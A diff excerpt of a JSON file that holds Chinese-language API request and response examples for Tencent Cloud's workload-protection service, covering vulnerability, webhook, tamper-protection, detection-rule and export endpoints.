\"VulFixSwitch\": 1\n }\n ],\n \"TotalCount\": 1,\n \"FollowVulCount\": 1,\n \"RequestId\": \"d73d4495-1895-43a8-95be-f447b02e253d\"\n }\n}",
|
2770
2742
|
"title": "获取指定分类和状态的漏洞列表"
|
2771
2743
|
}
|
2772
2744
|
],
|
@@ -2774,7 +2746,7 @@
|
|
2774
2746
|
{
|
2775
2747
|
"document": "示例",
|
2776
2748
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulOverview\n<公共请求参数>\n\n{}",
|
2777
|
-
"output": "{\n \"Response\": {\n \"EffectHost\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulAttackEvent\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulDefenceEvent\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"FollowVul\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"AllVul\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulStore\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"RequestId\": \"
|
2749
|
+
"output": "{\n \"Response\": {\n \"EffectHost\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulAttackEvent\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulDefenceEvent\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"FollowVul\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"AllVul\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"VulStore\": {\n \"TotalCount\": 1,\n \"TodayCount\": 0\n },\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
2778
2750
|
"title": "示例"
|
2779
2751
|
}
|
2780
2752
|
],
|
@@ -2782,7 +2754,7 @@
|
|
2782
2754
|
{
|
2783
2755
|
"document": "获取漏洞库列表\n\n",
|
2784
2756
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulStoreList\n<公共请求参数>\n\n{\n \"Filters\": [\n {\n \"Name\": \"VulName\",\n \"Values\": [\n \"CVE-2023-46604\"\n ],\n \"ExactMatch\": true\n }\n ],\n \"Limit\": 10,\n \"Offset\": 0,\n \"Order\": \"DESC\",\n \"By\": \"PublishDate\"\n}",
|
2785
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulId\": 105006,\n \"Level\": 4,\n \"Name\": \"Apache ActiveMQ远程代码执行漏洞(CVE-2023-46604)\",\n \"CveId\": \"CVE-2023-46604\",\n \"VulCategory\": 2,\n \"PublishDate\": \"2023-10-24 00:00:00\",\n \"Method\": 0,\n \"AttackLevel\": 3,\n \"FixSwitch\": 0,\n \"SupportDefense\": 1\n }\n ],\n \"TotalCount\": 1,\n \"Remaining\": 1,\n \"FreeSearchTimes\": 1,\n \"RequestId\": \"
|
2757
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"VulId\": 105006,\n \"Level\": 4,\n \"Name\": \"Apache ActiveMQ远程代码执行漏洞(CVE-2023-46604)\",\n \"CveId\": \"CVE-2023-46604\",\n \"VulCategory\": 2,\n \"PublishDate\": \"2023-10-24 00:00:00\",\n \"Method\": 0,\n \"AttackLevel\": 3,\n \"FixSwitch\": 0,\n \"SupportDefense\": 1\n }\n ],\n \"TotalCount\": 1,\n \"Remaining\": 1,\n \"FreeSearchTimes\": 1,\n \"RequestId\": \"e5b4724c-49af-46ab-bd84-cdbae897e7e0\"\n }\n}",
|
2786
2758
|
"title": "获取漏洞库列表"
|
2787
2759
|
}
|
2788
2760
|
],
|
@@ -2790,7 +2762,7 @@
|
|
2790
2762
|
{
|
2791
2763
|
"document": "漏洞top统计",
|
2792
2764
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulTop\n<公共请求参数>\n\n{\n \"Top\": \"5\"\n}",
|
2793
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\",\n \"VulTopList\": [\n {\n \"VulName\": \"Linux口令过期后账号最长有效天数策略\",\n \"VulLevel\": 1,\n \"VulCount\": 27
|
2765
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"f14ce73f-50d7-4c36-af1d-fc33dae510c4\",\n \"VulTopList\": [\n {\n \"VulName\": \"Linux口令过期后账号最长有效天数策略\",\n \"VulLevel\": 1,\n \"VulCount\": 27,\n \"VulId\": 1028\n },\n {\n \"VulName\": \"Linux未配置账户登录失败锁定策略\",\n \"VulLevel\": 2,\n \"VulCount\": 17,\n \"VulId\": 1028\n }\n ]\n }\n}",
|
2794
2766
|
"title": "漏洞top统计"
|
2795
2767
|
}
|
2796
2768
|
],
|
@@ -2798,7 +2770,7 @@
|
|
2798
2770
|
{
|
2799
2771
|
"document": "获取漏洞态势信息\n\n",
|
2800
2772
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeVulTrend\n<公共请求参数>\n\n{}",
|
2801
|
-
"output": "{\n \"Response\": {\n \"VulEventCount\": 1,\n \"IncreaseVulEventCount\": 1,\n \"HotVulCount\": 1,\n \"IncreaseHotVulCount\": 1,\n \"RequestId\": \"
|
2773
|
+
"output": "{\n \"Response\": {\n \"VulEventCount\": 1,\n \"IncreaseVulEventCount\": 1,\n \"HotVulCount\": 1,\n \"IncreaseHotVulCount\": 1,\n \"RequestId\": \"d73d4495-1895-43a8-95be-f447b02e253d\"\n }\n}",
|
2802
2774
|
"title": "获取漏洞态势信息"
|
2803
2775
|
}
|
2804
2776
|
],
|
@@ -2814,7 +2786,7 @@
|
|
2814
2786
|
{
|
2815
2787
|
"document": "告警设置-获取当前用户修改的告警列表",
|
2816
2788
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeWarningList\n&<公共请求参数>",
|
2817
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
2789
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"req-1002\",\n \"WarningInfoList\": [\n {\n \"Type\": 3,\n \"DisablePhoneWarning\": 1,\n \"BeginTime\": \"00:00\",\n \"EndTime\": \"23:23\",\n \"TimeZone\": \"Asia/Shanghai\",\n \"ControlBit\": 0,\n \"ControlBits\": \"000\",\n \"HostRange\": 0,\n \"Count\": 102\n }\n ]\n }\n}",
|
2818
2790
|
"title": "告警设置-获取当前用户修改的告警列表"
|
2819
2791
|
}
|
2820
2792
|
],
|
@@ -2822,7 +2794,7 @@
|
|
2822
2794
|
{
|
2823
2795
|
"document": "示例",
|
2824
2796
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookPolicy\n<公共请求参数>\n\n{\n \"Offset\": 0,\n \"Limit\": 1\n}",
|
2825
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"CustomFields\": [\n {\n \"Key\": \"机器a\",\n \"Value\": \"文本\"\n }\n ],\n \"Events\": [\n {\n \"ControlBit\": \"
|
2797
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"CustomFields\": [\n {\n \"Key\": \"机器a\",\n \"Value\": \"文本\"\n }\n ],\n \"Events\": [\n {\n \"ControlBit\": \"1010\",\n \"Type\": 18\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 17\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 2\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 6\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 9\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 10\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 11\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 15\n },\n {\n \"ControlBit\": \"1010\",\n \"Type\": 16\n },\n {\n \"ControlBit\": \"1\",\n \"Type\": 21\n },\n {\n \"ControlBit\": \"1\",\n \"Type\": 24\n }\n ],\n \"Format\": 0,\n \"HostCount\": 3,\n \"HostLabels\": [\n {\n \"Type\": 4,\n \"Values\": [\n \"Value1\"\n ]\n }\n ],\n \"Id\": 38,\n \"IsDisabled\": 0,\n \"Name\": \"机器人\",\n \"Quuids\": [\n \"058e0cf8-ba52-47fc-a100-2fdcc1e73e96\",\n \"00e800cb-7202-4d83-90c2-6e920758dd42\",\n \"380add75-bb06-4cc4-84c5-cf806d102fba\"\n ],\n \"Receivers\": [\n {\n \"Addr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=d0c2fc25-23a2-4285-ab98-d8a**\",\n \"Id\": 17,\n \"Name\": \"企微\"\n }\n ]\n }\n ],\n \"RequestId\": \"6933d139-3143-4590-805f-712489ea91b8\",\n \"TotalCount\": 16\n }\n}",
|
2826
2798
|
"title": "示例"
|
2827
2799
|
}
|
2828
2800
|
],
|
@@ -2830,7 +2802,7 @@
|
|
2830
2802
|
{
|
2831
2803
|
"document": "示例",
|
2832
2804
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookReceiver\n<公共请求参数>\n\n{\n \"Offset\": 0,\n \"Limit\": 10\n}",
|
2833
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Addr\": \"https://
|
2805
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Addr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=cbe03861-a7c6-48cf-a34c-44**\",\n \"Id\": 9,\n \"Name\": \"测试发送\"\n },\n {\n \"Addr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=d0c2fc25-23a2-4285-ab98-**\",\n \"Id\": 17,\n \"Name\": \"企微\"\n }\n ],\n \"RequestId\": \"a1fd9261-58a8-4947-877d-222198eeeb56\",\n \"TotalCount\": 2\n }\n}",
|
2834
2806
|
"title": "示例"
|
2835
2807
|
}
|
2836
2808
|
],
|
@@ -2845,16 +2817,16 @@
|
|
2845
2817
|
"DescribeWebHookRule": [
|
2846
2818
|
{
|
2847
2819
|
"document": "获取企微机器人规则详情",
|
2848
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookRule\n<公共请求参数>\n\n{\n \"Id\":
|
2849
|
-
"output": "{\n \"Response\": {\n \"Data\": {\n \"RuleId\":
|
2820
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookRule\n<公共请求参数>\n\n{\n \"Id\": 1\n}",
|
2821
|
+
"output": "{\n \"Response\": {\n \"Data\": {\n \"RuleId\": 1,\n \"RuleName\": \"alram\",\n \"HookAddr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=cbe03861-a8c6-48df-e34c-******\",\n \"RuleRemark\": \"remark\",\n \"RuleItems\": [\n {\n \"Type\": 11,\n \"ControlBit\": \"01111\"\n }\n ],\n \"HostLabels\": [\n {\n \"Type\": 4,\n \"Values\": []\n }\n ],\n \"HostIds\": [\n \"747c393e-f771-47ca-af1a-cc36b88f107a\"\n ],\n \"IsDisabled\": 0\n },\n \"RequestId\": \"747c393e-f771-47ca-af0a-cc36b88f107a\"\n }\n}",
|
2850
2822
|
"title": "获取企微机器人规则详情"
|
2851
2823
|
}
|
2852
2824
|
],
|
2853
2825
|
"DescribeWebHookRules": [
|
2854
2826
|
{
|
2855
2827
|
"document": "获取企微机器人规则列表",
|
2856
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookRules\n<公共请求参数>\n\n{\n \"Filter\": [],\n \"Offset\": 0,\n \"Limit\": 1,\n \"Order\": \"\",\n \"By\": \"\"\n}",
|
2857
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"RuleId\": 55,\n \"RuleName\": \"测试机器人\",\n \"HookAddr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=abe03861-a7c6-49cf-a12c-
|
2828
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebHookRules\n<公共请求参数>\n\n{\n \"Filter\": [],\n \"Offset\": 0,\n \"Limit\": 1,\n \"Order\": \"HostCount\",\n \"By\": \"asc\"\n}",
|
2829
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"RuleId\": 55,\n \"RuleName\": \"测试机器人\",\n \"HookAddr\": \"https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key=abe03861-a7c6-49cf-a12c-443c34b***\",\n \"RuleRemark\": \"robot remark\",\n \"RuleItems\": [\n {\n \"Type\": 24,\n \"ControlBit\": \"1\"\n }\n ],\n \"HostLabels\": [],\n \"HostCount\": 0,\n \"IsDisabled\": 1,\n \"CreateTime\": \"2023-02-17T18:41:03+08:00\",\n \"UpdateTime\": \"2023-02-28T10:18:15+08:00\"\n }\n ],\n \"RequestId\": \"e1b258f6-746d-4eb3-b7e0-ca400e7f8d71\",\n \"TotalCount\": 8\n }\n}",
|
2858
2830
|
"title": "获取企微机器人规则列表"
|
2859
2831
|
}
|
2860
2832
|
],
|
@@ -2862,7 +2834,7 @@
|
|
2862
2834
|
{
|
2863
2835
|
"document": "",
|
2864
2836
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebPageEventList\n<公共请求参数>\n\n{\n \"By\": \"CreateTime\",\n \"Order\": 1,\n \"Filters\": [\n {\n \"Name\": \"IpOrAlias\",\n \"Values\": [\n \"HostName or HostIp\"\n ]\n }\n ]\n}",
|
2865
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostName\": \"
|
2837
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"HostName\": \"DataHub\",\n \"HostIp\": \"1.2.3.4\",\n \"Quuid\": \"1c26308c-5493-4eaf-a817-112ec25f499e\",\n \"EventDir\": \"/root/csipdata/virus/php/1.php\",\n \"EventType\": 4,\n \"EventStatus\": 1,\n \"CreateTime\": \"2024-08-16 11:49:11\",\n \"RestoreTime\": \"2024-09-12 18:09:57\",\n \"Id\": 423826,\n \"FileType\": 0,\n \"MachineExtraInfo\": {\n \"WanIP\": \"1.2.3.4\",\n \"PrivateIP\": \"192.168.10.10\",\n \"NetworkType\": 0,\n \"NetworkName\": \"name\",\n \"InstanceID\": \"ins-ac13d\",\n \"HostName\": \"dataHub\"\n }\n }\n ],\n \"RequestId\": \"d9506441-52bc-4d14-a767-7e1251ed3ced\",\n \"TotalCount\": 1\n }\n}",
|
2866
2838
|
"title": "查询篡改事件列表"
|
2867
2839
|
}
|
2868
2840
|
],
|
@@ -2871,7 +2843,7 @@
|
|
2871
2843
|
"document": "",
|
2872
2844
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebPageGeneralize\n<公共请求参数>\n\n{}",
|
2873
2845
|
"output": "{\n \"Response\": {\n \"ProtectDirNum\": 1,\n \"ProtectFileNum\": 1,\n \"ProtectHostNum\": 1,\n \"ProtectMonitor\": 0,\n \"ProtectToday\": 1,\n \"RequestId\": \"a0ef4f15-b686-4e47-a4b5-89ad00232ad3\",\n \"TamperFileNum\": 1,\n \"TamperNum\": 1\n }\n}",
|
2874
|
-
"title": "
|
2846
|
+
"title": "查询网页防篡改概览信息"
|
2875
2847
|
}
|
2876
2848
|
],
|
2877
2849
|
"DescribeWebPageProtectStat": [
|
@@ -2879,14 +2851,14 @@
|
|
2879
2851
|
"document": "",
|
2880
2852
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebPageProtectStat\n<公共请求参数>\n\n{}",
|
2881
2853
|
"output": "{\n \"Response\": {\n \"FileTamperNum\": [\n {\n \"Name\": \"/tmp\",\n \"Num\": 56\n },\n {\n \"Name\": \"/data\",\n \"Num\": 1\n },\n {\n \"Name\": \"/var\",\n \"Num\": 6\n },\n {\n \"Name\": \"/root\",\n \"Num\": 4\n },\n {\n \"Name\": \"/dev\",\n \"Num\": 33\n }\n ],\n \"ProtectFileType\": [\n {\n \"Name\": \"boot\",\n \"Num\": 1\n },\n {\n \"Name\": \"start\",\n \"Num\": 2\n },\n {\n \"Name\": \"stop\",\n \"Num\": 3\n },\n {\n \"Name\": \"php\",\n \"Num\": 10\n }\n ],\n \"RequestId\": \"36c8cea5-7be7-4b61-8212-1ceb63330a5c\"\n }\n}",
|
2882
|
-
"title": "
|
2854
|
+
"title": "查询网页防篡改防护统计"
|
2883
2855
|
}
|
2884
2856
|
],
|
2885
2857
|
"DescribeWebPageServiceInfo": [
|
2886
2858
|
{
|
2887
2859
|
"document": "",
|
2888
2860
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeWebPageServiceInfo\n<公共请求参数>\n\n{}",
|
2889
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"g54f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"Status\": true,\n \"UsedNum\": 2,\n \"ResidueNum\": 0,\n \"BuyNum\": 2,\n \"ExpireNum\": 1,\n \"ExpiredNum\": 1,\n \"ProtectDirNum\": 1,\n \"AllAuthorizedMachines\": [\n {\n \"HostName\": \"
|
2861
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"g54f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"Status\": true,\n \"UsedNum\": 2,\n \"ResidueNum\": 0,\n \"BuyNum\": 2,\n \"ExpireNum\": 1,\n \"ExpiredNum\": 1,\n \"ProtectDirNum\": 1,\n \"AllAuthorizedMachines\": [\n {\n \"HostName\": \"机器1\",\n \"HostIp\": \"1.0.0.1\",\n \"CreateTime\": \"2020-10-10 10:10:00\",\n \"ExpireTime\": \"2021-10-10 10:10:00\"\n }\n ],\n \"ExpireAuthorizedMachines\": [\n {\n \"HostName\": \"机器2\",\n \"HostIp\": \"1.0.0.2\",\n \"SafeguardDirNum\": 1\n }\n ]\n }\n}",
|
2890
2862
|
"title": "查询网站防篡改服务信息"
|
2891
2863
|
}
|
2892
2864
|
],
|
@@ -2901,7 +2873,7 @@
|
|
2901
2873
|
"EditBashRules": [
|
2902
2874
|
{
|
2903
2875
|
"document": "新增/修改高危命令规则,之前的EditBashRule只支持用户输入单个IP去新增或修改高危命令规则,而该接口EditBashRules支持多服务器选择。",
|
2904
|
-
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"
|
2876
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditBashRules\n<公共请求参数>\n\n{\n \"Name\": \"yaxte****\",\n \"Level\": 1,\n \"Rule\": \".*\",\n \"IsGlobal\": 0,\n \"Uuids\": [\n \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\"\n ]\n}",
|
2905
2877
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
2906
2878
|
"title": "新增/修改高危命令规则"
|
2907
2879
|
}
|
@@ -2909,7 +2881,7 @@
|
|
2909
2881
|
"EditPrivilegeRules": [
|
2910
2882
|
{
|
2911
2883
|
"document": "新增/修改本地提权规则(支持多服务器选择)",
|
2912
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=EditPrivilegeRules\n&ProcessName=
|
2884
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=EditPrivilegeRules\n&ProcessName=ps\n&SMode=1\n&IsGlobal=0\n&Uuids.0=11\n&Uuids.1=12\n&<公共请求参数>",
|
2913
2885
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
2914
2886
|
"title": "新增/修改本地提权规则(支持多服务器选择)"
|
2915
2887
|
}
|
@@ -2917,7 +2889,7 @@
|
|
2917
2889
|
"EditReverseShellRules": [
|
2918
2890
|
{
|
2919
2891
|
"document": "编辑反弹Shell规则(支持多服务器选择)",
|
2920
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=EditReverseShellRules\n&ProcessName=
|
2892
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=EditReverseShellRules\n&ProcessName=ps\n&DestIp=1.2.3.4\n&DestPort=8080\n&IsGlobal=0\n&Uuids.0=11\n&Uuids.1=12\n&<公共请求参数>",
|
2921
2893
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
2922
2894
|
"title": "编辑反弹Shell规则(支持多服务器选择)"
|
2923
2895
|
}
|
@@ -2925,7 +2897,7 @@
|
|
2925
2897
|
"EditTags": [
|
2926
2898
|
{
|
2927
2899
|
"document": "新增/编辑标签",
|
2928
|
-
"input": "
|
2900
|
+
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: EditTags\n<公共请求参数>\n\n{\n \"Name\": \"tag-name\",\n \"Id\": 1,\n \"Quuids\": [\n \"dd90a245-ca7a-4268-9051-1fce4291****\"\n ]\n}",
|
2929
2901
|
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\"\n }\n}",
|
2930
2902
|
"title": "新增/编辑标签"
|
2931
2903
|
}
|
@@ -3022,7 +2994,7 @@
|
|
3022
2994
|
{
|
3023
2995
|
"document": "",
|
3024
2996
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportAssetRecentMachineInfo\n<公共请求参数>\n\n{\n \"BeginDate\": \"2020-09-22\",\n \"EndDate\": \"2020-09-22\"\n}",
|
3025
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"http://xx/xxx\",\n \"RequestId\": \"
|
2997
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"http://xx/xxx\",\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
3026
2998
|
"title": "导出主机概况趋势"
|
3027
2999
|
}
|
3028
3000
|
],
|
@@ -3030,7 +3002,7 @@
|
|
3030
3002
|
{
|
3031
3003
|
"document": "ExportAssetSystemPackageList",
|
3032
3004
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportAssetSystemPackageList\n<公共请求参数>\n\n{}",
|
3033
|
-
"output": "{\n \"Response\": {\n \"TaskId\": \"
|
3005
|
+
"output": "{\n \"Response\": {\n \"TaskId\": \"10001\",\n \"RequestId\": \"8394a30b-cc7c-43c5-9971-c48d097b03de\"\n }\n}",
|
3034
3006
|
"title": "导出资产管理系统安装包列表"
|
3035
3007
|
}
|
3036
3008
|
],
|
@@ -3038,7 +3010,7 @@
|
|
3038
3010
|
{
|
3039
3011
|
"document": "",
|
3040
3012
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportAssetUserList\n<公共请求参数>\n\n{}",
|
3041
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"
|
3013
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"1693599e-ff8f-4a8c-ae39-b4d9ba3ae9bf\",\n \"TaskId\": \"11\"\n }\n}",
|
3042
3014
|
"title": "导出账号列表"
|
3043
3015
|
}
|
3044
3016
|
],
|
@@ -3054,7 +3026,7 @@
|
|
3054
3026
|
{
|
3055
3027
|
"document": "",
|
3056
3028
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportAssetWebFrameList\n<公共请求参数>\n\n{}",
|
3057
|
-
"output": "{\n \"Response\": {\n \"TaskId\": \"
|
3029
|
+
"output": "{\n \"Response\": {\n \"TaskId\": \"1\",\n \"RequestId\": \"07a92740-5e54-4ea6-9320-c6fc3f3a1121\"\n }\n}",
|
3058
3030
|
"title": "导出资产管理Web框架列表"
|
3059
3031
|
}
|
3060
3032
|
],
|
@@ -3086,7 +3058,7 @@
|
|
3086
3058
|
{
|
3087
3059
|
"document": "导出漏洞影响主机列表数据",
|
3088
3060
|
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBaselineEffectHostList\n&BaselineId=1\n&<公共请求参数>",
|
3089
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"
|
3061
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://download.com/*\",\n \"RequestId\": \"requestId\",\n \"TaskId\": \"10001\"\n }\n}",
|
3090
3062
|
"title": "漏洞影响主机列表导出"
|
3091
3063
|
}
|
3092
3064
|
],
|
@@ -3125,8 +3097,8 @@
|
|
3125
3097
|
"ExportBaselineList": [
|
3126
3098
|
{
|
3127
3099
|
"document": "导出列表信息或者详情信息",
|
3128
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBaselineList\n&IfDetail=1\n&<公共请求参数>",
|
3129
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"
|
3100
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBaselineList\n&IfDetail=1\n&<公共请求参数> \n{\n \"Filter\": [\n {\n \"Name\": \"TaskId\",\n \"Value\": [\n \"10001\"\n ]\n }\n ]\n}",
|
3101
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"935e27b1-d675-4509-80bf-96fbf0764237\",\n \"TaskId\": \"1\"\n }\n}",
|
3130
3102
|
"title": "基线列表导出接口"
|
3131
3103
|
}
|
3132
3104
|
],
|
@@ -3149,8 +3121,8 @@
|
|
3149
3121
|
"ExportBashEvents": [
|
3150
3122
|
{
|
3151
3123
|
"document": "导出高危命令事件",
|
3152
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBashEvents\n&<公共请求参数>",
|
3153
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/
|
3124
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBashEvents\n&<公共请求参数> \n{\n \"Filter\": [\n {\n \"Name\": \"TaskId\",\n \"Value\": [\n \"10001\"\n ]\n }\n ]\n}",
|
3125
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/test.csv\",\n \"TaskId\": \"1133345\"\n }\n}",
|
3154
3126
|
"title": "导出高危命令事件"
|
3155
3127
|
}
|
3156
3128
|
],
|
@@ -3158,7 +3130,7 @@
|
|
3158
3130
|
{
|
3159
3131
|
"document": "导出高危命令事件",
|
3160
3132
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportBashEventsNew\n<公共请求参数>\n\n{}",
|
3161
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/
|
3133
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/test.csv\",\n \"TaskId\": \"1133345\"\n }\n}",
|
3162
3134
|
"title": "导出高危命令事件"
|
3163
3135
|
}
|
3164
3136
|
],
|
@@ -3166,15 +3138,15 @@
|
|
3166
3138
|
{
|
3167
3139
|
"document": "导出",
|
3168
3140
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: ExportBashPolicies\n<公共请求参数>\n\n{}",
|
3169
|
-
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"\",\n \"RequestId\": \"3f9a95a9-128e-45b4-a78f-3b1420590c76\",\n \"TaskId\": \"1663640357\"\n }\n}",
|
3141
|
+
"output": "{\n \"Response\": {\n \"DownloadUrl\": \"https://cwp-1258344***.cos.ap-guangzhou.myqcloud.com/file.txt\",\n \"RequestId\": \"3f9a95a9-128e-45b4-a78f-3b1420590c76\",\n \"TaskId\": \"1663640357\"\n }\n}",
|
3170
3142
|
"title": "示例"
|
3171
3143
|
}
|
3172
3144
|
],
|
3173
3145
|
"ExportBruteAttacks": [
|
3174
3146
|
{
|
3175
3147
|
"document": "导出密码破解记录成CSV文件",
|
3176
|
-
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBruteAttacks\n&<公共请求参数>",
|
3177
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/
|
3148
|
+
"input": "https://cwp.tencentcloudapi.com/?Action=ExportBruteAttacks\n&<公共请求参数> \n{\n \"Filter\": [\n {\n \"Name\": \"TaskId\",\n \"Value\": [\n \"10001\"\n ]\n }\n ]\n}",
|
3149
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"354f4ac3-8546-4516-8c8a-69e3ab73aa8a\",\n \"DownloadUrl\": \"http://download.url/test.csv\",\n \"TaskId\": \"1596595610\"\n }\n}",
|
3178
3150
|
"title": "导出密码破解记录"
|
3179
